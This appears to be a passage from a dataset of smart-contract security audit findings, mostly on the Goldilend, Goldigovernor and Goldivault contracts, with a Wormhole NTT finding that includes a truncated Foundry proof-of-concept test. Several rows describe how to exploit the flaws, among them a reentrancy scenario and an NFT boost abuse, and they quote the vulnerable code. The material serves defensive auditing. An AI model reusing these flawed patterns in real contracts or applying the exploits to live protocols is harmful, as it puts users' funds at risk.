interest;\\n loans[msg.sender][_userLoanId].borrowedAmount -= repayAmount;\\n loans[msg.sender][_userLoanId].interest -= interest;\\n poolSize += userLoan.interest * (1000 - (multisigShare + apdaoShare)) / 1000; //@audit should use interest instead of userLoan.interest\\n// rest of code\\n }\\n```\\n\\nIt should use `interest` instead of `userLoan.interest` because the user repaid `interest` only.",`poolSize` should be updated using `interest`.,`poolSize` would be tracked wrongly after calling `repay()` and several functions wouldn't work as expected.,"```\\n function repay(uint256 repayAmount, uint256 _userLoanId) external {\\n Loan memory userLoan = loans[msg.sender][_userLoanId];\\n if(userLoan.borrowedAmount < repayAmount) revert ExcessiveRepay();\\n if(block.timestamp > userLoan.endDate) revert LoanExpired();\\n uint256 interestLoanRatio = FixedPointMathLib.divWad(userLoan.interest, userLoan.borrowedAmount);\\n uint256 interest = FixedPointMathLib.mulWadUp(repayAmount, interestLoanRatio);\\n outstandingDebt -= repayAmount - interest > outstandingDebt ? outstandingDebt : repayAmount - interest;\\n loans[msg.sender][_userLoanId].borrowedAmount -= repayAmount;\\n loans[msg.sender][_userLoanId].interest -= interest;\\n poolSize += userLoan.interest * (1000 - (multisigShare + apdaoShare)) / 1000; //@audit should use interest instead of userLoan.interest\\n// rest of code\\n }\\n```\\n" +Users can extend an expired boost using invalidated NFTs.,high,"In `Goldilend.sol#L251`, a user can extend a boost with invalidated NFTs.\\nThe user has created a boost with a valid NFT.\\nAfter that, the NFT was invalidated using `adjustBoosts()`.\\nAfter the original boost is expired, the user can just call `boost()` with empty arrays, and the boost will be extended again with the original magnitude.\\n```\\n function _buildBoost(\\n address[] calldata partnerNFTs,\\n uint256[] calldata partnerNFTIds\\n ) internal returns (Boost memory newUserBoost) {\\n uint256 magnitude;\\n Boost storage userBoost = boosts[msg.sender];\\n if(userBoost.expiry == 0) {\\n// rest of code\\n }\\n else {\\n address[] storage nfts = userBoost.partnerNFTs;\\n uint256[] storage ids = userBoost.partnerNFTIds;\\n magnitude = userBoost.boostMagnitude; //@audit use old magnitude without checking\\n for (uint256 i = 0; i < partnerNFTs.length; i++) {\\n magnitude += partnerNFTBoosts[partnerNFTs[i]];\\n nfts.push(partnerNFTs[i]);\\n ids.push(partnerNFTIds[i]);\\n }\\n newUserBoost = Boost({\\n partnerNFTs: nfts,\\n partnerNFTIds: ids,\\n expiry: block.timestamp + boostLockDuration,\\n boostMagnitude: magnitude\\n });\\n }\\n }\\n```\\n","Whenever users extend their boosts, their NFTs should be evaluated again.",Malicious users can use invalidated NFTs to extend their boosts forever.,"```\\n function _buildBoost(\\n address[] calldata partnerNFTs,\\n uint256[] calldata partnerNFTIds\\n ) internal returns (Boost memory newUserBoost) {\\n uint256 magnitude;\\n Boost storage userBoost = boosts[msg.sender];\\n if(userBoost.expiry == 0) {\\n// rest of code\\n }\\n else {\\n address[] storage nfts = userBoost.partnerNFTs;\\n uint256[] storage ids = userBoost.partnerNFTIds;\\n magnitude = userBoost.boostMagnitude; //@audit use old magnitude without checking\\n for (uint256 i = 0; i < partnerNFTs.length; i++) {\\n magnitude += partnerNFTBoosts[partnerNFTs[i]];\\n nfts.push(partnerNFTs[i]);\\n ids.push(partnerNFTIds[i]);\\n }\\n newUserBoost = Boost({\\n partnerNFTs: nfts,\\n partnerNFTIds: ids,\\n expiry: block.timestamp + boostLockDuration,\\n boostMagnitude: magnitude\\n });\\n }\\n }\\n```\\n" +Team members can't unstake the initial allocation forever.,high,"When users call `unstake()`, it calculates the vested amount using `_vestingCheck()`.\\n```\\n function _vestingCheck(address user, uint256 amount) internal view returns (uint256) {\\n if(teamAllocations[user] > 0) return 0; //@audit return 0 for team members\\n uint256 initialAllocation = seedAllocations[user];\\n if(initialAllocation > 0) {\\n if(block.timestamp < vestingStart) return 0;\\n uint256 vestPortion = FixedPointMathLib.divWad(block.timestamp - vestingStart, vestingEnd - vestingStart);\\n return FixedPointMathLib.mulWad(vestPortion, initialAllocation) - (initialAllocation - stakedLocks[user]);\\n }\\n else {\\n return amount;\\n }\\n }\\n```\\n\\nBut it returns 0 for team members and they can't unstake forever. Furthermore, in `stake()`, it just prevents seed investors, not team members. So if team members have staked additionally, they can't unstake also.",`_vestingCheck` should use the same logic as initial investors for team mates.,Team members can't unstake forever.,"```\\n function _vestingCheck(address user, uint256 amount) internal view returns (uint256) {\\n if(teamAllocations[user] > 0) return 0; //@audit return 0 for team members\\n uint256 initialAllocation = seedAllocations[user];\\n if(initialAllocation > 0) {\\n if(block.timestamp < vestingStart) return 0;\\n uint256 vestPortion = FixedPointMathLib.divWad(block.timestamp - vestingStart, vestingEnd - vestingStart);\\n return FixedPointMathLib.mulWad(vestPortion, initialAllocation) - (initialAllocation - stakedLocks[user]);\\n }\\n else {\\n return amount;\\n }\\n }\\n```\\n" +"In `GovLocks`, it shouldn't use a `deposits` mapping",high,"In `GovLocks`, it tracks every user's deposit amount using a `deposits` mapping. As users can transfer `govLocks` freely, they might have fewer `deposits` than their `govLocks` balance and wouldn't be able to withdraw when they want.\\n```\\n function deposit(uint256 amount) external {\\n deposits[msg.sender] += amount; //@audit no need\\n _moveDelegates(address(0), delegates[msg.sender], amount);\\n SafeTransferLib.safeTransferFrom(locks, msg.sender, address(this), amount);\\n _mint(msg.sender, amount);\\n }\\n\\n /// @notice Withdraws Locks to burn Govlocks\\n /// @param amount Amount of Locks to withdraw\\n function withdraw(uint256 amount) external {\\n deposits[msg.sender] -= amount; //@audit no need\\n _moveDelegates(delegates[msg.sender], address(0), amount);\\n _burn(msg.sender, amount);\\n SafeTransferLib.safeTransfer(locks, msg.sender, amount);\\n }\\n```\\n\\nHere is a possible scenario.\\nAlice has deposited 100 `LOCKS` and got 100 `govLOCKS`. Also `deposits[Alice] = 100`.\\nBob bought 50 `govLOCKS` from Alice to get voting power.\\nWhen Bob tries to call `withdraw()`, it will revert because `deposits[Bob] = 0` although he has 50 `govLOCKS`.",We don't need to use the `deposits` mapping at all and we can just rely on `govLocks` balances.,Users wouldn't be able to withdraw `LOCKS` with `govLOCKS`.,"```\\n function deposit(uint256 amount) external {\\n deposits[msg.sender] += amount; //@audit no need\\n _moveDelegates(address(0), delegates[msg.sender], amount);\\n SafeTransferLib.safeTransferFrom(locks, msg.sender, address(this), amount);\\n _mint(msg.sender, amount);\\n }\\n\\n /// @notice Withdraws Locks to burn Govlocks\\n /// @param amount Amount of Locks to withdraw\\n function withdraw(uint256 amount) external {\\n deposits[msg.sender] -= amount; //@audit no need\\n _moveDelegates(delegates[msg.sender], address(0), amount);\\n _burn(msg.sender, amount);\\n SafeTransferLib.safeTransfer(locks, msg.sender, amount);\\n }\\n```\\n" +Some functions of `Goldilend` will revert forever.,high,"`Goldilend.multisigInterestClaim()/apdaoInterestClaim()/sunsetProtocol()` will revert forever because they doesn't withdraw `ibgt` from `ibgtVault` before the transfer.\\n```\\n function multisigInterestClaim() external {\\n if(msg.sender != multisig) revert NotMultisig();\\n uint256 interestClaim = multisigClaims;\\n multisigClaims = 0;\\n SafeTransferLib.safeTransfer(ibgt, multisig, interestClaim);\\n }\\n\\n /// @inheritdoc IGoldilend\\n function apdaoInterestClaim() external {\\n if(msg.sender != apdao) revert NotAPDAO();\\n uint256 interestClaim = apdaoClaims;\\n apdaoClaims = 0;\\n SafeTransferLib.safeTransfer(ibgt, apdao, interestClaim);\\n }\\n\\n// rest of code\\n\\n function sunsetProtocol() external {\\n if(msg.sender != timelock) revert NotTimelock();\\n SafeTransferLib.safeTransfer(ibgt, multisig, poolSize - outstandingDebt);\\n }\\n```\\n\\nAs `ibgtVault` has all `ibgt` of `Goldilend`, they should withdraw from `ibgtVault` first.","3 functions should be changed like the below.\\n```\\n function multisigInterestClaim() external {\\n if(msg.sender != multisig) revert NotMultisig();\\n uint256 interestClaim = multisigClaims;\\n multisigClaims = 0;\\n+ iBGTVault(ibgtVault).withdraw(interestClaim);\\n SafeTransferLib.safeTransfer(ibgt, multisig, interestClaim);\\n }\\n\\n /// @inheritdoc IGoldilend\\n function apdaoInterestClaim() external {\\n if(msg.sender != apdao) revert NotAPDAO();\\n uint256 interestClaim = apdaoClaims;\\n apdaoClaims = 0;\\n+ iBGTVault(ibgtVault).withdraw(interestClaim);\\n SafeTransferLib.safeTransfer(ibgt, apdao, interestClaim);\\n }\\n\\n// rest of code\\n\\n function sunsetProtocol() external {\\n if(msg.sender != timelock) revert NotTimelock();\\n+ iBGTVault(ibgtVault).withdraw(poolSize - outstandingDebt);\\n SafeTransferLib.safeTransfer(ibgt, multisig, poolSize - outstandingDebt);\\n }\\n```\\n",`Goldilend.multisigInterestClaim()/apdaoInterestClaim()/sunsetProtocol()` will revert forever.,"```\\n function multisigInterestClaim() external {\\n if(msg.sender != multisig) revert NotMultisig();\\n uint256 interestClaim = multisigClaims;\\n multisigClaims = 0;\\n SafeTransferLib.safeTransfer(ibgt, multisig, interestClaim);\\n }\\n\\n /// @inheritdoc IGoldilend\\n function apdaoInterestClaim() external {\\n if(msg.sender != apdao) revert NotAPDAO();\\n uint256 interestClaim = apdaoClaims;\\n apdaoClaims = 0;\\n SafeTransferLib.safeTransfer(ibgt, apdao, interestClaim);\\n }\\n\\n// rest of code\\n\\n function sunsetProtocol() external {\\n if(msg.sender != timelock) revert NotTimelock();\\n SafeTransferLib.safeTransfer(ibgt, multisig, poolSize - outstandingDebt);\\n }\\n```\\n" +`Goldigovernor._getProposalState()` shouldn't use `totalSupply`,medium,"In `_getProposalState()`, it uses `Goldiswap(goldiswap).totalSupply()` during the comparison.\\n```\\n function _getProposalState(uint256 proposalId) internal view returns (ProposalState) {\\n Proposal storage proposal = proposals[proposalId];\\n if (proposal.cancelled) return ProposalState.Canceled;\\n else if (block.number <= proposal.startBlock) return ProposalState.Pending;\\n else if (block.number <= proposal.endBlock) return ProposalState.Active;\\n else if (proposal.eta == 0) return ProposalState.Succeeded;\\n else if (proposal.executed) return ProposalState.Executed;\\n else if (proposal.forVotes <= proposal.againstVotes || proposal.forVotes < Goldiswap(goldiswap).totalSupply() / 20) { //@audit shouldn't use totalSupply\\n return ProposalState.Defeated;\\n }\\n else if (block.timestamp >= proposal.eta + Timelock(timelock).GRACE_PERIOD()) {\\n return ProposalState.Expired;\\n }\\n else {\\n return ProposalState.Queued;\\n }\\n }\\n```\\n\\nAs `totalSupply` is increasing in real time, a `Queued` proposal might be changed to `Defeated` one unexpectedly due to the increased supply.",We should introduce another mechanism for the quorum check rather than using `totalSupply`.,A proposal state might be changed unexpectedly.,```\\n function _getProposalState(uint256 proposalId) internal view returns (ProposalState) {\\n Proposal storage proposal = proposals[proposalId];\\n if (proposal.cancelled) return ProposalState.Canceled;\\n else if (block.number <= proposal.startBlock) return ProposalState.Pending;\\n else if (block.number <= proposal.endBlock) return ProposalState.Active;\\n else if (proposal.eta == 0) return ProposalState.Succeeded;\\n else if (proposal.executed) return ProposalState.Executed;\\n else if (proposal.forVotes <= proposal.againstVotes || proposal.forVotes < Goldiswap(goldiswap).totalSupply() / 20) { //@audit shouldn't use totalSupply\\n return ProposalState.Defeated;\\n }\\n else if (block.timestamp >= proposal.eta + Timelock(timelock).GRACE_PERIOD()) {\\n return ProposalState.Expired;\\n }\\n else {\\n return ProposalState.Queued;\\n }\\n }\\n```\\n +"In `Goldivault.redeemYield()`, users can redeem more yield tokens using reentrancy",medium,"Possible reentrancy in `Goldivault.redeemYield()` if `yieldToken` has a `beforeTokenTransfer` hook.\\nLet's assume `yt.totalSupply` = 100, `yieldToken.balance` = 100 and the user has 20 yt.\\nThe user calls `redeemYield()` with 10 yt.\\nThen `yt.totalSupply` will be changed to 90 and it will transfer `100 * 10 / 100 = 10 yieldToken` to the user.\\nInside the `beforeTokenTransfer` hook, the user calls `redeemYield()` again with 10 yt.\\nAs `yieldToken.balance` is still 100, he will receive `100 * 10 / 90 = 11 yieldToken`.\\n```\\n function redeemYield(uint256 amount) external {\\n if(amount == 0) revert InvalidRedemption();\\n if(block.timestamp < concludeTime + delay || !concluded) revert NotConcluded();\\n uint256 yieldShare = FixedPointMathLib.divWad(amount, ERC20(yt).totalSupply());\\n YieldToken(yt).burnYT(msg.sender, amount);\\n uint256 yieldTokensLength = yieldTokens.length;\\n for(uint8 i; i < yieldTokensLength; ++i) {\\n uint256 finalYield;\\n if(yieldTokens[i] == depositToken) {\\n finalYield = ERC20(yieldTokens[i]).balanceOf(address(this)) - depositTokenAmount;\\n }\\n else {\\n finalYield = ERC20(yieldTokens[i]).balanceOf(address(this));\\n }\\n uint256 claimable = FixedPointMathLib.mulWad(finalYield, yieldShare);\\n SafeTransferLib.safeTransfer(yieldTokens[i], msg.sender, claimable);\\n }\\n emit YieldTokenRedemption(msg.sender, amount);\\n }\\n```\\n",We should add a `nonReentrant` modifier to `redeemYield()`.,Malicious users can steal `yieldToken` using `redeemYield()`.,"```\\n function redeemYield(uint256 amount) external {\\n if(amount == 0) revert InvalidRedemption();\\n if(block.timestamp < concludeTime + delay || !concluded) revert NotConcluded();\\n uint256 yieldShare = FixedPointMathLib.divWad(amount, ERC20(yt).totalSupply());\\n YieldToken(yt).burnYT(msg.sender, amount);\\n uint256 yieldTokensLength = yieldTokens.length;\\n for(uint8 i; i < yieldTokensLength; ++i) {\\n uint256 finalYield;\\n if(yieldTokens[i] == depositToken) {\\n finalYield = ERC20(yieldTokens[i]).balanceOf(address(this)) - depositTokenAmount;\\n }\\n else {\\n finalYield = ERC20(yieldTokens[i]).balanceOf(address(this));\\n }\\n uint256 claimable = FixedPointMathLib.mulWad(finalYield, yieldShare);\\n SafeTransferLib.safeTransfer(yieldTokens[i], msg.sender, claimable);\\n }\\n emit YieldTokenRedemption(msg.sender, amount);\\n }\\n```\\n" +Wrong validation in `Goldigovernor.cancel()`,medium,"In `Goldigovernor.cancel()`, the proposer should have fewer votes than `proposalThreshold` to cancel his proposal.\\n```\\n function cancel(uint256 proposalId) external {\\n if(_getProposalState(proposalId) == ProposalState.Executed) revert InvalidProposalState();\\n Proposal storage proposal = proposals[proposalId];\\n if(msg.sender != proposal.proposer) revert NotProposer();\\n if(GovLocks(govlocks).getPriorVotes(proposal.proposer, block.number - 1) > proposalThreshold) revert AboveThreshold(); //@audit incorrect\\n proposal.cancelled = true;\\n uint256 targetsLength = proposal.targets.length;\\n for (uint256 i = 0; i < targetsLength; i++) {\\n Timelock(timelock).cancelTransaction(proposal.targets[i], proposal.eta, proposal.values[i], proposal.calldatas[i], proposal.signatures[i]);\\n }\\n emit ProposalCanceled(proposalId);\\n }\\n```\\n","It should be modified like this.\\n```\\nif(msg.sender != proposal.proposer && GovLocks(govlocks).getPriorVotes(proposal.proposer, block.number - 1) > proposalThreshold) revert Error;\\n```\\n",A proposer can't cancel his proposal unless he decreases his voting power.,"```\\n function cancel(uint256 proposalId) external {\\n if(_getProposalState(proposalId) == ProposalState.Executed) revert InvalidProposalState();\\n Proposal storage proposal = proposals[proposalId];\\n if(msg.sender != proposal.proposer) revert NotProposer();\\n if(GovLocks(govlocks).getPriorVotes(proposal.proposer, block.number - 1) > proposalThreshold) revert AboveThreshold(); //@audit incorrect\\n proposal.cancelled = true;\\n uint256 targetsLength = proposal.targets.length;\\n for (uint256 i = 0; i < targetsLength; i++) {\\n Timelock(timelock).cancelTransaction(proposal.targets[i], proposal.eta, proposal.values[i], proposal.calldatas[i], proposal.signatures[i]);\\n }\\n emit ProposalCanceled(proposalId);\\n }\\n```\\n" +Users wouldn't cancel their proposals due to the increased `proposalThreshold`.,medium,"When users call `cancel()`, it validates the caller's voting power with `proposalThreshold` which can be changed using `setProposalThreshold()`.\\n```\\n function setProposalThreshold(uint256 newProposalThreshold) external {\\n if(msg.sender != multisig) revert NotMultisig();\\n if(newProposalThreshold < MIN_PROPOSAL_THRESHOLD || newProposalThreshold > MAX_PROPOSAL_THRESHOLD) revert InvalidVotingParameter();\\n uint256 oldProposalThreshold = proposalThreshold;\\n proposalThreshold = newProposalThreshold;\\n emit ProposalThresholdSet(oldProposalThreshold, proposalThreshold);\\n }\\n```\\n\\nHere is a possible scenario.\\nLet's assume `proposalThreshold` = 100 and a user has 100 voting power.\\nThe user has proposed a proposal using `propose()`.\\nAfter that, `proposalThreshold` was increased to 150 by `multisig`.\\nWhen the user calls `cancel()`, it will revert as he doesn't have enough voting power.",It would be good to cache `proposalThreshold` as a proposal state.,Users wouldn't cancel their proposals due to the increased `proposalThreshold`.,"```\\n function setProposalThreshold(uint256 newProposalThreshold) external {\\n if(msg.sender != multisig) revert NotMultisig();\\n if(newProposalThreshold < MIN_PROPOSAL_THRESHOLD || newProposalThreshold > MAX_PROPOSAL_THRESHOLD) revert InvalidVotingParameter();\\n uint256 oldProposalThreshold = proposalThreshold;\\n proposalThreshold = newProposalThreshold;\\n emit ProposalThresholdSet(oldProposalThreshold, proposalThreshold);\\n }\\n```\\n" +`Goldilend.liquidate()` might revert due to underflow,medium,"In `repay()`, there would be a rounding during the `interest` calculation.\\n```\\n function repay(uint256 repayAmount, uint256 _userLoanId) external {\\n Loan memory userLoan = loans[msg.sender][_userLoanId];\\n if(userLoan.borrowedAmount < repayAmount) revert ExcessiveRepay();\\n if(block.timestamp > userLoan.endDate) revert LoanExpired();\\n uint256 interestLoanRatio = FixedPointMathLib.divWad(userLoan.interest, userLoan.borrowedAmount);\\nL425 uint256 interest = FixedPointMathLib.mulWadUp(repayAmount, interestLoanRatio); //@audit rounding issue\\n outstandingDebt -= repayAmount - interest > outstandingDebt ? outstandingDebt : repayAmount - interest;\\n // rest of code\\n }\\n// rest of code\\n function liquidate(address user, uint256 _userLoanId) external {\\n Loan memory userLoan = loans[msg.sender][_userLoanId];\\n if(block.timestamp < userLoan.endDate || userLoan.liquidated || userLoan.borrowedAmount == 0) revert Unliquidatable();\\n loans[user][_userLoanId].liquidated = true;\\n loans[user][_userLoanId].borrowedAmount = 0;\\nL448 outstandingDebt -= userLoan.borrowedAmount - userLoan.interest;\\n // rest of code\\n }\\n```\\n\\nHere is a possible scenario.\\nThere are 2 borrowers of `borrowedAmount = 100, `interest` = 10`. And `outstandingDebt = 2 * (100 - 10) = 180`.\\nThe first borrower calls `repay()` with `repayAmount = 100`.\\nDue to the rounding issue at L425, `interest` is 9 instead of 10. And `outstandingDebt = 180 - (100 - 9) = 89`.\\nIn `liquidate()` for the second borrower, it will revert at L448 because `outstandingDebt = 89 < borrowedAmount - `interest` = 90`.","In `liquidate()`, `outstandingDebt` should be updated like the below.\\n```\\n /// @inheritdoc IGoldilend\\n function liquidate(address user, uint256 _userLoanId) external {\\n Loan memory userLoan = loans[msg.sender][_userLoanId];\\n if(block.timestamp < userLoan.endDate || userLoan.liquidated || userLoan.borrowedAmount == 0) revert Unliquidatable();\\n loans[user][_userLoanId].liquidated = true;\\n loans[user][_userLoanId].borrowedAmount = 0;\\n// Add the line below\\n uint256 debtToRepay = userLoan.borrowedAmount - userLoan.interest;\\n// Add the line below\\n outstandingDebt -= debtToRepay > outstandingDebt ? outstandingDebt : debtToRepay;\\n // rest of code\\n }\\n```\\n",`liquidate()` might revert due to underflow.,"```\\n function repay(uint256 repayAmount, uint256 _userLoanId) external {\\n Loan memory userLoan = loans[msg.sender][_userLoanId];\\n if(userLoan.borrowedAmount < repayAmount) revert ExcessiveRepay();\\n if(block.timestamp > userLoan.endDate) revert LoanExpired();\\n uint256 interestLoanRatio = FixedPointMathLib.divWad(userLoan.interest, userLoan.borrowedAmount);\\nL425 uint256 interest = FixedPointMathLib.mulWadUp(repayAmount, interestLoanRatio); //@audit rounding issue\\n outstandingDebt -= repayAmount - interest > outstandingDebt ? outstandingDebt : repayAmount - interest;\\n // rest of code\\n }\\n// rest of code\\n function liquidate(address user, uint256 _userLoanId) external {\\n Loan memory userLoan = loans[msg.sender][_userLoanId];\\n if(block.timestamp < userLoan.endDate || userLoan.liquidated || userLoan.borrowedAmount == 0) revert Unliquidatable();\\n loans[user][_userLoanId].liquidated = true;\\n loans[user][_userLoanId].borrowedAmount = 0;\\nL448 outstandingDebt -= userLoan.borrowedAmount - userLoan.interest;\\n // rest of code\\n }\\n```\\n" +"In `Goldigovernor`, wrong assumption of block time",medium,"In `Goldigovernor.sol`, voting period/delay limits are set with 15s block time.\\n```\\n /// @notice Minimum voting period\\n uint32 public constant MIN_VOTING_PERIOD = 5760; // About 24 hours\\n\\n /// @notice Maximum voting period\\n uint32 public constant MAX_VOTING_PERIOD = 80640; // About 2 weeks\\n\\n /// @notice Minimum voting delay\\n uint32 public constant MIN_VOTING_DELAY = 1;\\n\\n /// @notice Maximum voting delay\\n uint32 public constant MAX_VOTING_DELAY = 40320; // About 1 week\\n```\\n\\nBut Berachain has 5s block time according to its documentation.\\n```\\nBerachain has the following properties:\\n\\n- Block time: 5s\\n```\\n\\nSo these limits will be set shorter than expected.",We should calculate these limits with 5s block time.,Voting period/delay limits will be set shorter than expected.,```\\n /// @notice Minimum voting period\\n uint32 public constant MIN_VOTING_PERIOD = 5760; // About 24 hours\\n\\n /// @notice Maximum voting period\\n uint32 public constant MAX_VOTING_PERIOD = 80640; // About 2 weeks\\n\\n /// @notice Minimum voting delay\\n uint32 public constant MIN_VOTING_DELAY = 1;\\n\\n /// @notice Maximum voting delay\\n uint32 public constant MAX_VOTING_DELAY = 40320; // About 1 week\\n```\\n +Queued transfers can become stuck on the source chain if Transceiver instructions are encoded in the incorrect order,high,"In the case of multiple Transceivers, the current logic expects that a sender encodes Transceiver instructions in order of increasing Transceiver registration index, as validated in `TransceiverStructs::parseTransceiverInstructions`. Under normal circumstances, this logic works as expected, and the transaction fails when the user packs transceiver instructions in the incorrect order.\\n```\\n/* snip */\\nfor (uint256 i = 0; i < instructionsLength; i++) {\\n TransceiverInstruction memory instruction;\\n (instruction, offset) = parseTransceiverInstructionUnchecked(encoded, offset);\\n\\n uint8 instructionIndex = instruction.index;\\n\\n // The instructions passed in have to be strictly increasing in terms of transceiver index\\n if (i != 0 && instructionIndex <= lastIndex) {\\n revert UnorderedInstructions();\\n }\\n lastIndex = instructionIndex;\\n\\n instructions[instructionIndex] = instruction;\\n}\\n/* snip */\\n```\\n\\nHowever, this requirement on the order of Transceiver indices is not checked when transfers are initially queued for delayed execution. As a result, a transaction where this is the case will fail when the user calls `NttManager::completeOutboundQueuedTransfer` to execute a queued transfer.","When the transfer amount exceeds the current outbound capacity, verify the Transceiver instructions are ordered correctly before adding a message to the list of queued transfers.","The sender's funds are transferred to the NTT Manager when messages are queued. However, this queued message can never be executed if the Transceiver indices are incorrectly ordered and, as a result, the user funds remain stuck in the NTT Manager.\\nProof of Concept: Run the following test:\\n```\\ncontract TestWrongTransceiverOrder is Test, INttManagerEvents, IRateLimiterEvents {\\n NttManager nttManagerChain1;\\n NttManager nttManagerChain2;\\n\\n using TrimmedAmountLib for uint256;\\n using TrimmedAmountLib for TrimmedAmount;\\n\\n uint16 constant chainId1 = 7;\\n uint16 constant chainId2 = 100;\\n uint8 constant FAST_CONSISTENCY_LEVEL = 200;\\n uint256 constant GAS_LIMIT = 500000;\\n\\n uint16 constant SENDING_CHAIN_ID = 1;\\n uint256 constant DEVNET_GUARDIAN_PK =\\n 0xcfb12303a19cde580bb4dd771639b0d26bc68353645571a8cff516ab2ee113a0;\\n WormholeSimulator guardian;\\n uint256 initialBlockTimestamp;\\n\\n WormholeTransceiver wormholeTransceiverChain1;\\n WormholeTransceiver wormholeTransceiver2Chain1;\\n\\n WormholeTransceiver wormholeTransceiverChain2;\\n address userA = address(0x123);\\n address userB = address(0x456);\\n address userC = address(0x789);\\n address userD = address(0xABC);\\n\\n address relayer = address(0x28D8F1Be96f97C1387e94A53e00eCcFb4E75175a);\\n IWormhole wormhole = IWormhole(0x706abc4E45D419950511e474C7B9Ed348A4a716c);\\n\\n function setUp() public {\\n string memory url = ""https://goerli.blockpi.network/v1/rpc/public"";\\n vm.createSelectFork(url);\\n initialBlockTimestamp = vm.getBlockTimestamp();\\n\\n guardian = new WormholeSimulator(address(wormhole), DEVNET_GUARDIAN_PK);\\n\\n vm.chainId(chainId1);\\n DummyToken t1 = new DummyToken();\\n NttManager implementation =\\n new MockNttManagerContract(address(t1), INttManager.Mode.LOCKING, chainId1, 1 days);\\n\\n nttManagerChain1 =\\n MockNttManagerContract(address(new ERC1967Proxy(address(implementation), """")));\\n nttManagerChain1.initialize();\\n\\n WormholeTransceiver wormholeTransceiverChain1Implementation = new MockWormholeTransceiverContract(\\n address(nttManagerChain1),\\n address(wormhole),\\n address(relayer),\\n address(0x0),\\n FAST_CONSISTENCY_LEVEL,\\n GAS_LIMIT\\n );\\n wormholeTransceiverChain1 = MockWormholeTransceiverContract(\\n address(new ERC1967Proxy(address(wormholeTransceiverChain1Implementation), """"))\\n );\\n\\n WormholeTransceiver wormholeTransceiverChain1Implementation2 = new MockWormholeTransceiverContract(\\n address(nttManagerChain1),\\n address(wormhole),\\n address(relayer),\\n address(0x0),\\n FAST_CONSISTENCY_LEVEL,\\n GAS_LIMIT\\n );\\n wormholeTransceiver2Chain1 = MockWormholeTransceiverContract(\\n address(new ERC1967Proxy(address(wormholeTransceiverChain1Implementation2), """"))\\n );\\n\\n\\n // Actually initialize properly now\\n wormholeTransceiverChain1.initialize();\\n wormholeTransceiver2Chain1.initialize();\\n\\n\\n nttManagerChain1.setTransceiver(address(wormholeTransceiverChain1));\\n nttManagerChain1.setTransceiver(address(wormholeTransceiver2Chain1));\\n nttManagerChain1.setOutboundLimit(type(uint64).max);\\n nttManagerChain1.setInboundLimit(type(uint64).max, chainId2);\\n\\n // Chain 2 setup\\n vm.chainId(chainId2);\\n DummyToken t2 = new DummyTokenMintAndBurn();\\n NttManager implementationChain2 =\\n new MockNttManagerContract(address(t2), INttManager.Mode.BURNING, chainId2, 1 days);\\n\\n nttManagerChain2 =\\n MockNttManagerContract(address(new ERC1967Proxy(address(implementationChain2), """")));\\n nttManagerChain2.initialize();\\n\\n WormholeTransceiver wormholeTransceiverChain2Implementation = new MockWormholeTransceiverContract(\\n address(nttManagerChain2),\\n address(wormhole),\\n address(relayer),\\n address(0x0),\\n FAST_CONSISTENCY_LEVEL,\\n GAS_LIMIT\\n );\\n\\n wormholeTransceiverChain2 = MockWormholeTransceiverContract(\\n address(new ERC1967Proxy(address(wormholeTransceiverChain2Implementation), """"))\\n );\\n wormholeTransceiverChain2.initialize();\\n\\n nttManagerChain2.setTransceiver(address(wormholeTransceiverChain2));\\n nttManagerChain2.setOutboundLimit(type(uint64).max);\\n nttManagerChain2.setInboundLimit(type(uint64).max, chainId1);\\n\\n // Register peer contracts for the nttManager and transceiver. Transceivers and nttManager each have the concept of peers here.\\n nttManagerChain1.setPeer(chainId2, bytes32(uint256(uint160(address(nttManagerChain2)))), 9);\\n nttManagerChain2.setPeer(chainId1, bytes32(uint256(uint160(address(nttManagerChain1)))), 7);\\n\\n // Set peers for the transceivers\\n wormholeTransceiverChain1.setWormholePeer(\\n chainId2, bytes32(uint256(uint160(address(wormholeTransceiverChain2))))\\n );\\n\\n wormholeTransceiver2Chain1.setWormholePeer(\\n chainId2, bytes32(uint256(uint160(address(wormholeTransceiverChain2))))\\n );\\n\\n wormholeTransceiverChain2.setWormholePeer(\\n chainId1, bytes32(uint256(uint160(address(wormholeTransceiverChain1))))\\n );\\n\\n require(nttManagerChain1.getThreshold() != 0, ""Threshold is zero with active transceivers"");\\n\\n // Actually set it\\n nttManagerChain1.setThreshold(2);\\n nttManagerChain2.setThreshold(1);\\n }\\n\\n function testWrongTransceiverOrder() external {\\n vm.chainId(chainId1);\\n\\n // Setting up the transfer\\n DummyToken token1 = DummyToken(nttManagerChain1.token());\\n uint8 decimals = token1.decimals();\\n\\n token1.mintDummy(address(userA), 5 * 10 ** decimals);\\n uint256 outboundLimit = 4 * 10 ** decimals;\\n nttManagerChain1.setOutboundLimit(outboundLimit);\\n\\n vm.startPrank(userA);\\n\\n uint256 transferAmount = 5 * 10 ** decimals;\\n token1.approve(address(nttManagerChain1), transferAmount);\\n\\n // transfer with shouldQueue == true\\n uint64 qSeq = nttManagerChain1.transfer(\\n transferAmount, chainId2, toWormholeFormat(userB), true, encodeTransceiverInstructionsJumbled(true)\\n );\\n\\n assertEq(qSeq, 0);\\n IRateLimiter.OutboundQueuedTransfer memory qt = nttManagerChain1.getOutboundQueuedTransfer(0);\\n assertEq(qt.amount.getAmount(), transferAmount.trim(decimals, decimals).getAmount());\\n assertEq(qt.recipientChain, chainId2);\\n assertEq(qt.recipient, toWormholeFormat(userB));\\n assertEq(qt.txTimestamp, initialBlockTimestamp);\\n\\n // assert that the contract also locked funds from the user\\n assertEq(token1.balanceOf(address(userA)), 0);\\n assertEq(token1.balanceOf(address(nttManagerChain1)), transferAmount);\\n\\n // elapse rate limit duration - 1\\n uint256 durationElapsedTime = initialBlockTimestamp + nttManagerChain1.rateLimitDuration();\\n\\n vm.warp(durationElapsedTime);\\n\\n vm.expectRevert(0x71f23ef2); //UnorderedInstructions() selector\\n nttManagerChain1.completeOutboundQueuedTransfer(0);\\n }\\n\\n // Encode an instruction for each of the relayers\\n function encodeTransceiverInstructionsJumbled(bool relayer_off) public view returns (bytes memory) {\\n WormholeTransceiver.WormholeTransceiverInstruction memory instruction =\\n IWormholeTransceiver.WormholeTransceiverInstruction(relayer_off);\\n\\n bytes memory encodedInstructionWormhole =\\n wormholeTransceiverChain1.encodeWormholeTransceiverInstruction(instruction);\\n\\n TransceiverStructs.TransceiverInstruction memory TransceiverInstruction1 =\\n TransceiverStructs.TransceiverInstruction({index: 0, payload: encodedInstructionWormhole});\\n TransceiverStructs.TransceiverInstruction memory TransceiverInstruction2 =\\n TransceiverStructs.TransceiverInstruction({index: 1, payload: encodedInstructionWormhole});\\n\\n TransceiverStructs.TransceiverInstruction[] memory TransceiverInstructions =\\n new 